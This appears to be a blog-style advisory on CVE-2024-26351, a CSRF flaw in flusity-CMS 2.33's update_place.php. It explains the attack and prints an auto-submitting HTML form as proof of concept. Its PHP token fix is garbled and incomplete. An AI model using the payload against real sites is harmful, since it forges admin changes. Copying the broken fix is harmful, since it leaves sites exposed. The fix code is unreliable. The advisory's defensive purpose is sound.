---

Introduction

In early 2024, a vulnerability was discovered in the popular open-source content management system flusity-CMS, specifically affecting version 2.33. Labeled as CVE-2024-26351, this issue exposes websites to a Cross-Site Request Forgery (CSRF) attack through the /core/tools/update_place.php component. Let’s break down what this vulnerability is, how attackers might exploit it, and ways you can protect your site.

What Is a CSRF Attack?

A Cross-Site Request Forgery (CSRF) attack tricks an authenticated user into performing actions without their consent. If a website does not properly verify requests, malicious websites can force users’ browsers to submit unwanted actions on their behalf.

The flusity-CMS v2.33 Vulnerability

In flusity-CMS version 2.33, the file /core/tools/update_place.php accepts sensitive actions (such as updates to content or configurations) via HTTP requests. Unfortunately, these requests are not protected by any CSRF token or anti-forgery measure, letting attackers forge them easily.

Why Is This Dangerous?

If users are logged into their CMS admin panel, attackers can lure them to visit a malicious website. The attacker’s site then silently sends a crafted POST or GET request to /core/tools/update_place.php, making unwanted edits or changes—using the user’s valid session!

Exploit Details — Proof of Concept

Here’s how an attacker might leverage CVE-2024-26351:
Suppose /core/tools/update_place.php takes parameters like place_id and new_value to update content.

On a malicious website, the attacker can embed the following HTML form

<!-- CSRF exploit for flusity-CMS v2.33 -->
<form action="http://target-site.com/core/tools/update_place.php"; method="POST" id="csrf_form">
  <input type="hidden" name="place_id" value="1">
  <input type="hidden" name="new_value" value="HackedByCSRF">
</form>
<script>
  document.getElementById('csrf_form').submit();
</script>

Are you running flusity-CMS v2.33?

- Does the file /core/tools/update_place.php handle sensitive updates?

References

- CVE Details - CVE-2024-26351
- OWASP: Cross-Site Request Forgery (CSRF)
- flusity-CMS Official GitHub *(No official fix as of publication)*

How To Fix

Short-Term Workaround:
Restrict access to /core/tools/update_place.php via server configuration so only permitted users or IP addresses can submit requests.

Proper Fix:

`php

// Generate Token

$_SESSION['csrf_token'] = bin2hex(random_bytes(32));

?>

// Validate Token Before Processing POST

die('Invalid CSRF token.');

}

Conclusion

CSRF vulnerabilities like CVE-2024-26351 are dangerous because they exploit the trust a site places in a user’s browser. For website admins using flusity-CMS v2.33, it’s important to mitigate the issue as soon as possible, either by applying the fixes above or upgrading when a patch becomes available.

Stay informed and keep your CMS secure!

If you found this useful or have questions, don’t hesitate to comment below or check the original CVE-2024-26351 entry for updates.

Timeline

Published on: 02/22/2024 14:15:47 UTC
Last modified on: 11/01/2024 19:35:19 UTC